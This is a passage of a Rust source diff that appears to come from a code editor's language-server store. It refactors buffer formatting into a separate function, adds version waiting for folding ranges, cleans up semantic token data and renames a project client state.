@@ -2655,7 +2654,7 @@ impl LspCommand for GetCodeActions {
Some(requested.clone())
}
} else {
- supported
+ None
};
Ok(lsp::CodeActionParams {
@@ -4857,9 +4856,14 @@ impl LspCommand for GetFoldingRanges {
self,
message: proto::GetFoldingRangesResponse,
_: Entity<LspStore>,
- _: Entity<Buffer>,
- _: AsyncApp,
+ buffer: Entity<Buffer>,
+ mut cx: AsyncApp,
) -> Result<Self::Response> {
+ buffer
+ .update(&mut cx, |buffer, _| {
+ buffer.wait_for_version(deserialize_version(&message.version))
+ })
+ .await?;
message
.ranges
.into_iter()
@@ -1611,28 +1611,6 @@ impl LocalLspStore {
})
})?;
- /// Apply edits to the buffer that will become part of the formatting transaction.
- /// Fails if the buffer has been edited since the start of that transaction.
- fn extend_formatting_transaction(
- buffer: &FormattableBuffer,
- formatting_transaction_id: text::TransactionId,
- cx: &mut AsyncApp,
- operation: impl FnOnce(&mut Buffer, &mut Context<Buffer>),
- ) -> anyhow::Result<()> {
- buffer.handle.update(cx, |buffer, cx| {
- let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id());
- if last_transaction_id != Some(formatting_transaction_id) {
- anyhow::bail!("Buffer edited while formatting. Aborting")
- }
- buffer.start_transaction();
- operation(buffer, cx);
- if let Some(transaction_id) = buffer.end_transaction(cx) {
- buffer.merge_transactions(transaction_id, formatting_transaction_id);
- }
- Ok(())
- })
- }
-
// handle whitespace formatting
if settings.remove_trailing_whitespace_on_save {
zlog::trace!(logger => "removing trailing whitespace");
@@ -1702,504 +1680,532 @@ impl LocalLspStore {
} else {
formatter
};
- match formatter {
- Formatter::Auto => unreachable!("Auto resolved above"),
- Formatter::Prettier => {
- let logger = zlog::scoped!(logger => "prettier");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer via prettier");
-
- let prettier = lsp_store.read_with(cx, |lsp_store, _cx| {
- lsp_store.prettier_store().unwrap().downgrade()
- })?;
- let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx)
+ if let Err(err) = Self::apply_formatter(
+ formatter,
+ &lsp_store,
+ buffer,
+ formatting_transaction_id,
+ &adapters_and_servers,
+ &settings,
+ request_timeout,
+ logger,
+ cx,
+ )
+ .await
+ {
+ zlog::error!(logger => "Formatter failed, skipping: {err:#}");
+ }
+ }
+
+ Ok(())
+ }
+
+ async fn apply_formatter(
+ formatter: &Formatter,
+ lsp_store: &WeakEntity<LspStore>,
+ buffer: &FormattableBuffer,
+ formatting_transaction_id: clock::Lamport,
+ adapters_and_servers: &[(Arc<CachedLspAdapter>, Arc<LanguageServer>)],
+ settings: &LanguageSettings,
+ request_timeout: Duration,
+ logger: zlog::Logger,
+ cx: &mut AsyncApp,
+ ) -> anyhow::Result<()> {
+ match formatter {
+ Formatter::None => {
+ zlog::trace!(logger => "skipping formatter 'none'");
+ return Ok(());
+ }
+ Formatter::Auto => {
+ debug_panic!("Auto resolved above");
+ return Ok(());
+ }
+ Formatter::Prettier => {
+ let logger = zlog::scoped!(logger => "prettier");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer via prettier");
+
+ let prettier = lsp_store.read_with(cx, |lsp_store, _cx| {
+ lsp_store.prettier_store().unwrap().downgrade()
+ })?;
+ let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx)
+ .await
+ .transpose()?;
+ let Some(diff) = diff else {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
+ };
+
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.apply_diff(diff, cx);
+ },
+ )?;
+ }
+ Formatter::External { command, arguments } => {
+ let logger = zlog::scoped!(logger => "command");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer via external command");
+
+ let diff =
+ Self::format_via_external_command(buffer, &command, arguments.as_deref(), cx)
.await
- .transpose()?;
- let Some(diff) = diff else {
- zlog::trace!(logger => "No changes");
- continue;
- };
+ .with_context(|| {
+ format!("Failed to format buffer via external command: {}", command)
+ })?;
+ let Some(diff) = diff else {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
+ };
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- buffer.apply_diff(diff, cx);
- },
- )?;
- }
- Formatter::External { command, arguments } => {
- let logger = zlog::scoped!(logger => "command");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer via external command");
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.apply_diff(diff, cx);
+ },
+ )?;
+ }
+ Formatter::LanguageServer(specifier) => {
+ let logger = zlog::scoped!(logger => "language-server");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer using language server");
- let diff = Self::format_via_external_command(
- buffer,
- &command,
- arguments.as_deref(),
+ let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
+ zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping");
+ return Ok(());
+ };
+
+ let language_server = match specifier {
+ settings::LanguageServerFormatterSpecifier::Specific { name } => {
+ adapters_and_servers.iter().find_map(|(adapter, server)| {
+ if adapter.name.0.as_ref() == name {
+ Some(server.clone())
+ } else {
+ None
+ }
+ })
+ }
+ settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers
+ .iter()
+ .find(|(_, server)| Self::server_supports_formatting(server))
+ .map(|(_, server)| server.clone()),
+ };
+
+ let Some(language_server) = language_server else {
+ log::debug!(
+ "No language server found to format buffer '{:?}'. Skipping",
+ buffer_path_abs.as_path().to_string_lossy()
+ );
+ return Ok(());
+ };
+
+ zlog::trace!(
+ logger =>
+ "Formatting buffer '{:?}' using language server '{:?}'",
+ buffer_path_abs.as_path().to_string_lossy(),
+ language_server.name()
+ );
+
+ let edits = if let Some(ranges) = buffer.ranges.as_ref() {
+ zlog::trace!(logger => "formatting ranges");
+ Self::format_ranges_via_lsp(
+ &lsp_store,
+ &buffer.handle,
+ ranges,
+ buffer_path_abs,
+ &language_server,
+ &settings,
cx,
)
.await
- .with_context(|| {
- format!("Failed to format buffer via external command: {}", command)
- })?;
- let Some(diff) = diff else {
- zlog::trace!(logger => "No changes");
- continue;
- };
-
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
+ .context("Failed to format ranges via language server")?
+ } else {
+ zlog::trace!(logger => "formatting full");
+ Self::format_via_lsp(
+ &lsp_store,
+ &buffer.handle,
+ buffer_path_abs,
+ &language_server,
+ &settings,
cx,
- |buffer, cx| {
- buffer.apply_diff(diff, cx);
- },
- )?;
+ )
+ .await
+ .context("failed to format via language server")?
+ };
+
+ if edits.is_empty() {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
}
- Formatter::LanguageServer(specifier) => {
- let logger = zlog::scoped!(logger => "language-server");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer using language server");
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.edit(edits, None, cx);
+ },
+ )?;
+ }
+ Formatter::CodeAction(code_action_name) => {
+ let logger = zlog::scoped!(logger => "code-actions");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer using code actions");
- let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
- zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping");
- continue;
- };
+ let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
+ zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping");
+ return Ok(());
+ };
- let language_server = match specifier {
- settings::LanguageServerFormatterSpecifier::Specific { name } => {
- adapters_and_servers.iter().find_map(|(adapter, server)| {
- if adapter.name.0.as_ref() == name {
- Some(server.clone())
- } else {
- None
- }
- })
- }
- settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers
- .iter()
- .find(|(_, server)| Self::server_supports_formatting(server))
- .map(|(_, server)| server.clone()),
- };
+ let code_action_kind: CodeActionKind = code_action_name.clone().into();
+ zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind);
- let Some(language_server) = language_server else {
- log::debug!(
- "No language server found to format buffer '{:?}'. Skipping",
- buffer_path_abs.as_path().to_string_lossy()
+ let mut actions_and_servers = Vec::new();
+
+ for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() {
+ let actions_result = Self::get_server_code_actions_from_action_kinds(
+ &lsp_store,
+ language_server.server_id(),
+ vec![code_action_kind.clone()],
+ &buffer.handle,
+ cx,
+ )
+ .await
+ .with_context(|| {
+ format!(
+ "Failed to resolve code action {:?} with language server {}",
+ code_action_kind,
+ language_server.name()
+ )
+ });
+ let Ok(actions) = actions_result else {
+ // note: it may be better to set result to the error and break formatters here
+ // but for now we try to execute the actions that we can resolve and skip the rest
+ zlog::error!(
+ logger =>
+ "Failed to resolve code action {:?} with language server {}",
+ code_action_kind,
+ language_server.name()
);
continue;
};
+ for action in actions {
+ actions_and_servers.push((action, index));
+ }
+ }
- zlog::trace!(
- logger =>
- "Formatting buffer '{:?}' using language server '{:?}'",
- buffer_path_abs.as_path().to_string_lossy(),
- language_server.name()
- );
+ if actions_and_servers.is_empty() {
+ zlog::warn!(logger => "No code actions were resolved, continuing");
+ return Ok(());
+ }
- let edits = if let Some(ranges) = buffer.ranges.as_ref() {
- zlog::trace!(logger => "formatting ranges");
- Self::format_ranges_via_lsp(
- &lsp_store,
- &buffer.handle,
- ranges,
- buffer_path_abs,
- &language_server,
- &settings,
- cx,
- )
- .await
- .context("Failed to format ranges via language server")?
- } else {
- zlog::trace!(logger => "formatting full");
- Self::format_via_lsp(
- &lsp_store,
- &buffer.handle,
- buffer_path_abs,
- &language_server,
- &settings,
- cx,
+ 'actions: for (mut action, server_index) in actions_and_servers {
+ let server = &adapters_and_servers[server_index].1;
+
+ let describe_code_action = |action: &CodeAction| {
+ format!(
+ "code action '{}' with title \"{}\" on server {}",
+ action
+ .lsp_action
+ .action_kind()
+ .unwrap_or("unknown".into())
+ .as_str(),
+ action.lsp_action.title(),
+ server.name(),
)
- .await
- .context("failed to format via language server")?
};
- if edits.is_empty() {
- zlog::trace!(logger => "No changes");
- continue;
- }
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- buffer.edit(edits, None, cx);
- },
- )?;
- }
- Formatter::CodeAction(code_action_name) => {
- let logger = zlog::scoped!(logger => "code-actions");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer using code actions");
+ zlog::trace!(logger => "Executing {}", describe_code_action(&action));
- let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
- zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping");
+ if let Err(err) =
+ Self::try_resolve_code_action(server, &mut action, request_timeout).await
+ {
+ zlog::error!(
+ logger =>
+ "Failed to resolve {}. Error: {}",
+ describe_code_action(&action),
+ err
+ );
continue;
- };
-
- let code_action_kind: CodeActionKind = code_action_name.clone().into();
- zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind);
-
- let mut actions_and_servers = Vec::new();
+ }
- for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() {
- let actions_result = Self::get_server_code_actions_from_action_kinds(
- &lsp_store,
- language_server.server_id(),
- vec![code_action_kind.clone()],
- &buffer.handle,
- cx,
- )
- .await
- .with_context(|| {
- format!(
- "Failed to resolve code action {:?} with language server {}",
- code_action_kind,
- language_server.name()
- )
- });
- let Ok(actions) = actions_result else {
- // note: it may be better to set result to the error and break formatters here
- // but for now we try to execute the actions that we can resolve and skip the rest
- zlog::error!(
+ if let Some(edit) = action.lsp_action.edit().cloned() {
+ // NOTE: code below duplicated from `Self::deserialize_workspace_edit`
+ // but filters out and logs warnings for code actions that require unreasonably
+ // difficult handling on our part, such as:
+ // - applying edits that call commands
+ // which can result in arbitrary workspace edits being sent from the server that
+ // have no way of being tied back to the command that initiated them (i.e. we
+ // can't know which edits are part of the format request, or if the server is done sending
+ // actions in response to the command)
+ // - actions that create/delete/modify/rename files other than the one we are formatting
+ // as we then would need to handle such changes correctly in the local history as well
+ // as the remote history through the ProjectTransaction
+ // - actions with snippet edits, as these simply don't make sense in the context of a format request
+ // Supporting these actions is not impossible, but not supported as of yet.
+ if edit.changes.is_none() && edit.document_changes.is_none() {
+ zlog::trace!(
logger =>
- "Failed to resolve code action {:?} with language server {}",
- code_action_kind,
- language_server.name()
+ "No changes for code action. Skipping {}",
+ describe_code_action(&action),
);
continue;
- };
- for action in actions {
- actions_and_servers.push((action, index));
}
- }
-
- if actions_and_servers.is_empty() {
- zlog::warn!(logger => "No code actions were resolved, continuing");
- continue;
- }
- 'actions: for (mut action, server_index) in actions_and_servers {
- let server = &adapters_and_servers[server_index].1;
-
- let describe_code_action = |action: &CodeAction| {
- format!(
- "code action '{}' with title \"{}\" on server {}",
- action
- .lsp_action
- .action_kind()
- .unwrap_or("unknown".into())
- .as_str(),
- action.lsp_action.title(),
- server.name(),
- )
- };
+ let mut operations = Vec::new();
+ if let Some(document_changes) = edit.document_changes {
+ match document_changes {
+ lsp::DocumentChanges::Edits(edits) => operations.extend(
+ edits.into_iter().map(lsp::DocumentChangeOperation::Edit),
+ ),
+ lsp::DocumentChanges::Operations(ops) => operations = ops,
+ }
+ } else if let Some(changes) = edit.changes {
+ operations.extend(changes.into_iter().map(|(uri, edits)| {
+ lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit {
+ text_document: lsp::OptionalVersionedTextDocumentIdentifier {
+ uri,
+ version: None,
+ },
+ edits: edits.into_iter().map(Edit::Plain).collect(),
+ })
+ }));
+ }
- zlog::trace!(logger => "Executing {}", describe_code_action(&action));
+ let mut edits = Vec::with_capacity(operations.len());
- if let Err(err) =
- Self::try_resolve_code_action(server, &mut action, request_timeout)
- .await
- {
- zlog::error!(
+ if operations.is_empty() {
+ zlog::trace!(
logger =>
- "Failed to resolve {}. Error: {}",
+ "No changes for code action. Skipping {}",
describe_code_action(&action),
- err
);
continue;
}
-
- if let Some(edit) = action.lsp_action.edit().cloned() {
- // NOTE: code below duplicated from `Self::deserialize_workspace_edit`
- // but filters out and logs warnings for code actions that require unreasonably
- // difficult handling on our part, such as:
- // - applying edits that call commands
- // which can result in arbitrary workspace edits being sent from the server that
- // have no way of being tied back to the command that initiated them (i.e. we
- // can't know which edits are part of the format request, or if the server is done sending
- // actions in response to the command)
- // - actions that create/delete/modify/rename files other than the one we are formatting
- // as we then would need to handle such changes correctly in the local history as well
- // as the remote history through the ProjectTransaction
- // - actions with snippet edits, as these simply don't make sense in the context of a format request
- // Supporting these actions is not impossible, but not supported as of yet.
- if edit.changes.is_none() && edit.document_changes.is_none() {
- zlog::trace!(
+ for operation in operations {
+ let op = match operation {
+ lsp::DocumentChangeOperation::Edit(op) => op,
+ lsp::DocumentChangeOperation::Op(_) => {
+ zlog::warn!(
+ logger =>
+ "Code actions which create, delete, or rename files are not supported on format. Skipping {}",
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ }
+ };
+ let Ok(file_path) = op.text_document.uri.to_file_path() else {
+ zlog::warn!(
logger =>
- "No changes for code action. Skipping {}",
+ "Failed to convert URI '{:?}' to file path. Skipping {}",
+ &op.text_document.uri,
describe_code_action(&action),
);
- continue;
- }
-
- let mut operations = Vec::new();
- if let Some(document_changes) = edit.document_changes {
- match document_changes {
- lsp::DocumentChanges::Edits(edits) => operations.extend(
- edits.into_iter().map(lsp::DocumentChangeOperation::Edit),
- ),
- lsp::DocumentChanges::Operations(ops) => operations = ops,
- }
- } else if let Some(changes) = edit.changes {
- operations.extend(changes.into_iter().map(|(uri, edits)| {
- lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit {
- text_document:
- lsp::OptionalVersionedTextDocumentIdentifier {
- uri,
- version: None,
- },
- edits: edits.into_iter().map(Edit::Plain).collect(),
- })
- }));
- }
-
- let mut edits = Vec::with_capacity(operations.len());
-
- if operations.is_empty() {
- zlog::trace!(
+ continue 'actions;
+ };
+ if &file_path != buffer_path_abs {
+ zlog::warn!(
logger =>
- "No changes for code action. Skipping {}",
+ "File path '{:?}' does not match buffer path '{:?}'. Skipping {}",
+ file_path,
+ buffer_path_abs,
describe_code_action(&action),
);
- continue;
+ continue 'actions;
}
- for operation in operations {
- let op = match operation {
- lsp::DocumentChangeOperation::Edit(op) => op,
- lsp::DocumentChangeOperation::Op(_) => {
+
+ let mut lsp_edits = Vec::new();
+ for edit in op.edits {
+ match edit {
+ Edit::Plain(edit) => {
+ if !lsp_edits.contains(&edit) {
+ lsp_edits.push(edit);
+ }
+ }
+ Edit::Annotated(edit) => {
+ if !lsp_edits.contains(&edit.text_edit) {
+ lsp_edits.push(edit.text_edit);
+ }
+ }
+ Edit::Snippet(_) => {
zlog::warn!(
logger =>
- "Code actions which create, delete, or rename files are not supported on format. Skipping {}",
+ "Code actions which produce snippet edits are not supported during formatting. Skipping {}",
describe_code_action(&action),
);
continue 'actions;
}
- };
- let Ok(file_path) = op.text_document.uri.to_file_path() else {
- zlog::warn!(
- logger =>
- "Failed to convert URI '{:?}' to file path. Skipping {}",
- &op.text_document.uri,
- describe_code_action(&action),
- );
- continue 'actions;
- };
- if &file_path != buffer_path_abs {
- zlog::warn!(
- logger =>
- "File path '{:?}' does not match buffer path '{:?}'. Skipping {}",
- file_path,
- buffer_path_abs,
- describe_code_action(&action),
- );
- continue 'actions;
- }
-
- let mut lsp_edits = Vec::new();
- for edit in op.edits {
- match edit {
- Edit::Plain(edit) => {
- if !lsp_edits.contains(&edit) {
- lsp_edits.push(edit);
- }
- }
- Edit::Annotated(edit) => {
- if !lsp_edits.contains(&edit.text_edit) {
- lsp_edits.push(edit.text_edit);
- }
- }
- Edit::Snippet(_) => {
- zlog::warn!(
- logger =>
- "Code actions which produce snippet edits are not supported during formatting. Skipping {}",
- describe_code_action(&action),
- );
- continue 'actions;
- }
- }
}
- let edits_result = lsp_store
- .update(cx, |lsp_store, cx| {
- lsp_store.as_local_mut().unwrap().edits_from_lsp(
- &buffer.handle,
- lsp_edits,
- server.server_id(),
- op.text_document.version,
- cx,
- )
- })?
- .await;
- let Ok(resolved_edits) = edits_result else {
- zlog::warn!(
- logger =>
- "Failed to resolve edits from LSP for buffer {:?} while handling {}",
- buffer_path_abs.as_path(),
- describe_code_action(&action),
- );
- continue 'actions;
- };
- edits.extend(resolved_edits);
- }
-
- if edits.is_empty() {
- zlog::warn!(logger => "No edits resolved from LSP");
- continue;
}
-
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- zlog::info!(
- "Applying edits {edits:?}. Content: {:?}",
- buffer.text()
- );
- buffer.edit(edits, None, cx);
- zlog::info!("Applied edits. New Content: {:?}", buffer.text());
- },
- )?;
+ let edits_result = lsp_store
+ .update(cx, |lsp_store, cx| {
+ lsp_store.as_local_mut().unwrap().edits_from_lsp(
+ &buffer.handle,
+ lsp_edits,
+ server.server_id(),
+ op.text_document.version,
+ cx,
+ )
+ })?
+ .await;
+ let Ok(resolved_edits) = edits_result else {
+ zlog::warn!(
+ logger =>
+ "Failed to resolve edits from LSP for buffer {:?} while handling {}",
+ buffer_path_abs.as_path(),
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ };
+ edits.extend(resolved_edits);
}
- // bail early if command is invalid
- let Some(command) = action.lsp_action.command() else {
- continue;
- };
-
- zlog::warn!(
- logger =>
- "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history",
- &command.command,
- );
-
- let server_capabilities = server.capabilities();
- let available_commands = server_capabilities
- .execute_command_provider
- .as_ref()
- .map(|options| options.commands.as_slice())
- .unwrap_or_default();
- if !available_commands.contains(&command.command) {
- zlog::warn!(
- logger =>
- "Cannot execute a command {} not listed in the language server capabilities of server {}",
- command.command,
- server.name(),
- );
+ if edits.is_empty() {
+ zlog::warn!(logger => "No edits resolved from LSP");
continue;
}
- // noop so we just ensure buffer hasn't been edited since resolving code actions
extend_formatting_transaction(
buffer,
formatting_transaction_id,
cx,
- |_, _| {},
+ |buffer, cx| {
+ zlog::info!(
+ "Applying edits {edits:?}. Content: {:?}",
+ buffer.text()
+ );
+ buffer.edit(edits, None, cx);
+ zlog::info!("Applied edits. New Content: {:?}", buffer.text());
+ },
)?;
- zlog::info!(logger => "Executing command {}", &command.command);
+ }
- lsp_store.update(cx, |this, _| {
- this.as_local_mut()
- .unwrap()
- .last_workspace_edits_by_language_server
- .remove(&server.server_id());
- })?;
+ let Some(command) = action.lsp_action.command() else {
+ continue;
+ };
- let execute_command_result = server
- .request::<lsp::request::ExecuteCommand>(
- lsp::ExecuteCommandParams {
- command: command.command.clone(),
- arguments: command.arguments.clone().unwrap_or_default(),
- ..Default::default()
- },
- request_timeout,
- )
- .await
- .into_response();
+ zlog::warn!(
+ logger =>
+ "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history",
+ &command.command,
+ );
- if execute_command_result.is_err() {
- zlog::error!(
- logger =>
- "Failed to execute command '{}' as part of {}",
- &command.command,
- describe_code_action(&action),
- );
- continue 'actions;
- }
+ let server_capabilities = server.capabilities();
+ let available_commands = server_capabilities
+ .execute_command_provider
+ .as_ref()
+ .map(|options| options.commands.as_slice())
+ .unwrap_or_default();
+ if !available_commands.contains(&command.command) {
+ zlog::warn!(
+ logger =>
+ "Cannot execute a command {} not listed in the language server capabilities of server {}",
+ command.command,
+ server.name(),
+ );
+ continue;
+ }
- let mut project_transaction_command = lsp_store.update(cx, |this, _| {
- this.as_local_mut()
- .unwrap()
- .last_workspace_edits_by_language_server
- .remove(&server.server_id())
- .unwrap_or_default()
- })?;
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |_, _| {},
+ )?;
+ zlog::info!(logger => "Executing command {}", &command.command);
- if let Some(transaction) =
- project_transaction_command.0.remove(&buffer.handle)
- {
- zlog::trace!(
- logger =>
- "Successfully captured {} edits that resulted from command {}",
- transaction.edit_ids.len(),
- &command.command,
- );
- let transaction_id_project_transaction = transaction.id;
- buffer.handle.update(cx, |buffer, _| {
- // it may have been removed from history if push_to_history was
- // false in deserialize_workspace_edit. If so push it so we
- // can merge it with the format transaction
- // and pop the combined transaction off the history stack
- // later if push_to_history is false
- if buffer.get_transaction(transaction.id).is_none() {
- buffer.push_transaction(transaction, Instant::now());
- }
- buffer.merge_transactions(
- transaction_id_project_transaction,
- formatting_transaction_id,
- );
- });
- }
+ lsp_store.update(cx, |this, _| {
+ this.as_local_mut()
+ .unwrap()
+ .last_workspace_edits_by_language_server
+ .remove(&server.server_id());
+ })?;
- if project_transaction_command.0.is_empty() {
- continue;
- }
+ let execute_command_result = server
+ .request::<lsp::request::ExecuteCommand>(
+ lsp::ExecuteCommandParams {
+ command: command.command.clone(),
+ arguments: command.arguments.clone().unwrap_or_default(),
+ ..Default::default()
+ },
+ request_timeout,
+ )
+ .await
+ .into_response();
- let mut extra_buffers = String::new();
- for buffer in project_transaction_command.0.keys() {
- buffer.read_with(cx, |b, cx| {
- let Some(path) = b.project_path(cx) else {
- return;
- };
+ if execute_command_result.is_err() {
+ zlog::error!(
+ logger =>
+ "Failed to execute command '{}' as part of {}",
+ &command.command,
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ }
- if !extra_buffers.is_empty() {
- extra_buffers.push_str(", ");
- }
- extra_buffers.push_str(path.path.as_unix_str());
- });
- }
- zlog::warn!(
+ let mut project_transaction_command = lsp_store.update(cx, |this, _| {
+ this.as_local_mut()
+ .unwrap()
+ .last_workspace_edits_by_language_server
+ .remove(&server.server_id())
+ .unwrap_or_default()
+ })?;
+
+ if let Some(transaction) = project_transaction_command.0.remove(&buffer.handle)
+ {
+ zlog::trace!(
logger =>
- "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].",
+ "Successfully captured {} edits that resulted from command {}",
+ transaction.edit_ids.len(),
&command.command,
- extra_buffers,
);
- // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction
- // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction,
- // add it so it's included, and merge it into the format transaction when its created later
+ let transaction_id_project_transaction = transaction.id;
+ buffer.handle.update(cx, |buffer, _| {
+ // it may have been removed from history if push_to_history was
+ // false in deserialize_workspace_edit. If so push it so we
+ // can merge it with the format transaction
+ // and pop the combined transaction off the history stack
+ // later if push_to_history is false
+ if buffer.get_transaction(transaction.id).is_none() {
+ buffer.push_transaction(transaction, Instant::now());
+ }
+ buffer.merge_transactions(
+ transaction_id_project_transaction,
+ formatting_transaction_id,
+ );
+ });
+ }
+
+ if project_transaction_command.0.is_empty() {
+ continue;
+ }
+
+ let mut extra_buffers = String::new();
+ for buffer in project_transaction_command.0.keys() {
+ buffer.read_with(cx, |b, cx| {
+ let Some(path) = b.project_path(cx) else {
+ return;
+ };
+
+ if !extra_buffers.is_empty() {
+ extra_buffers.push_str(", ");
+ }
+ extra_buffers.push_str(path.path.as_unix_str());
+ });
}
+ zlog::warn!(
+ logger =>
+ "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].",
+ &command.command,
+ extra_buffers,
+ );
+ // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction
+ // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction,
+ // add it so it's included, and merge it into the format transaction when its created later
}
}
}
@@ -3914,6 +3920,7 @@ pub struct LspStore {
pub lsp_server_capabilities: HashMap<LanguageServerId, lsp::ServerCapabilities>,
semantic_token_config: SemanticTokenConfig,
lsp_data: HashMap<BufferId, BufferLspData>,
+ buffer_reload_tasks: HashMap<BufferId, Task<anyhow::Result<()>>>,
next_hint_id: Arc<AtomicUsize>,
}
@@ -3963,10 +3970,7 @@ impl BufferLspData {
self.inlay_hints.remove_server_data(for_server);
if let Some(semantic_tokens) = &mut self.semantic_tokens {
- semantic_tokens.raw_tokens.servers.remove(&for_server);
- semantic_tokens
- .latest_invalidation_requests
- .remove(&for_server);
+ semantic_tokens.remove_server_data(for_server);
}
if let Some(folding_ranges) = &mut self.folding_ranges {
@@ -585,8 +585,7 @@ async fn raw_to_buffer_semantic_tokens(
}
Some(BufferSemanticToken {
- range: buffer_snapshot.anchor_before(start)
- ..buffer_snapshot.anchor_after(end),
+ range: buffer_snapshot.anchor_range_around(start..end),
token_type: token.token_type,
token_modifiers: token.token_modifiers,
})
@@ -611,6 +610,14 @@ pub struct SemanticTokensData {
update: Option<(Global, SemanticTokensTask)>,
}
+impl SemanticTokensData {
+ pub(super) fn remove_server_data(&mut self, server_id: LanguageServerId) {
+ self.raw_tokens.servers.remove(&server_id);
+ self.latest_invalidation_requests.remove(&server_id);
+ self.update = None;
+ }
+}
+
/// All the semantic token tokens for a buffer.
///
/// This aggregates semantic tokens from multiple language servers in a specific order.
@@ -33,7 +33,7 @@ pub mod search_history;
pub mod yarn;
use dap::inline_value::{InlineValueLocation, VariableLookupKind, VariableScope};
-use itertools::Either;
+use itertools::{Either, Itertools};
use crate::{
git_store::GitStore,
@@ -43,12 +43,11 @@ use crate::{
worktree_store::WorktreeIdCounter,
};
pub use agent_registry_store::{AgentRegistryStore, RegistryAgent};
-pub use agent_server_store::{
- AgentServerStore, AgentServersUpdated, ExternalAgentServerName, ExternalAgentSource,
-};
+pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, ExternalAgentSource};
pub use git_store::{
ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate,
git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal},
+ linked_worktree_short_name, worktrees_directory_for_repo,
};
pub use manifest_tree::ManifestTree;
pub use project_search::{Search, SearchResults};
@@ -121,6 +120,7 @@ use std::{
borrow::Cow,
collections::BTreeMap,
ffi::OsString,
+ future::Future,
ops::{Not as _, Range},
path::{Path, PathBuf},
pin::pin,
@@ -135,6 +135,7 @@ use text::{Anchor, BufferId, OffsetRangeExt, Point, Rope};
use toolchain_store::EmptyToolchainStore;
use util::{
ResultExt as _, maybe,
+ path_list::PathList,
paths::{PathStyle, SanitizedPath, is_absolute},
rel_path::RelPath,
};
@@ -306,7 +307,7 @@ enum ProjectClientState {
/// Multi-player mode but still a local project.
Shared { remote_id: u64 },
/// Multi-player mode but working on a remote project.
- Remote {
+ Collab {
sharing_has_stopped: bool,
capability: Capability,
remote_id: u64,
@@ -1815,7 +1816,7 @@ impl Project {
client_subscriptions: Default::default(),
_subscriptions: vec![cx.on_release(Self::release)],
collab_client: client.clone(),
- client_state: ProjectClientState::Remote {
+ client_state: ProjectClientState::Collab {
sharing_has_stopped: false,
capability: Capability::ReadWrite,
remote_id,
@@ -1933,7 +1934,7 @@ impl Project {
ProjectClientState::Shared { .. } => {
let _ = self.unshare_internal(cx);
}
- ProjectClientState::Remote { remote_id, .. } => {
+ ProjectClientState::Collab { remote_id, .. } => {
let _ = self.collab_client.send(proto::LeaveProject {
project_id: *remote_id,
});
@@ -2078,6 +2079,12 @@ impl Project {
self.worktree_store.clone()
}
+ /// Returns a future that resolves when all visible worktrees have completed
+ /// their initial scan.
+ pub fn wait_for_initial_scan(&self, cx: &App) -> impl Future<Output = ()> + use<> {
+ self.worktree_store.read(cx).wait_for_initial_scan()
+ }
+
#[inline]
pub fn context_server_store(&self) -> Entity<ContextServerStore> {
self.context_server_store.clone()
@@ -2159,7 +2166,7 @@ impl Project {
match self.client_state {
ProjectClientState::Local => None,
ProjectClientState::Shared { remote_id, .. }
